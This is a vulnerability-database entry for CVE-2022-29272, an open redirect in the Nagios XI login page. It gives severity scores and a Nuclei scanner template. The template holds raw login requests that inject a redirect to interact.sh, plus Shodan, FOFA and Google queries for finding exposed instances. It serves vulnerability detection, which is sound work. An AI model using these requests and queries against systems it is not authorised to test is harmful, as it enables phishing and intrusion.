Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29272
HistoryAug 16, 2022 - 4:14 p.m.

Nagios XI <5.8.5 - Open Redirect

2022-08-1616:14:18
ProjectDiscovery
github.com
21
cve
nagios
nagiosxi
redirect
open redirect
medium vulnerability

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

62.1%

Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-29272

info:
  name: Nagios XI <5.8.5 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
  remediation: |
    Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability.
  reference:
    - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
    - https://github.com/4LPH4-NL/CVEs
    - https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29272
    - https://assets.nagios.com/downloads/nagiosxi/CHANGES-5.TXT
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-29272
    cwe-id: CWE-601
    epss-score: 0.0033
    epss-percentile: 0.67975
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2022,redirect,nagios,nagiosxi

http:
  - raw:
      - |
        GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1

    extractors:
      - type: regex
        name: nsp_token
        group: 1
        regex:
          - '<input type="hidden" name="nsp" value="(.*)">'
          - "<input type='hidden' name='nsp' value='(.*)'>"
        internal: true
        part: body
# digest: 4a0a00473045022100ada9f9385d42bbe51a6df0910a0da1641991e3372b498422a440dc9db86692f302200fd91caa7eeb8e0b5de66267c7d0f3650b8e89366861b6f680b2a6cbc12b5ca0:922c64590222798bb761d5b6d8e72950

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

62.1%

Related for NUCLEI:CVE-2022-29272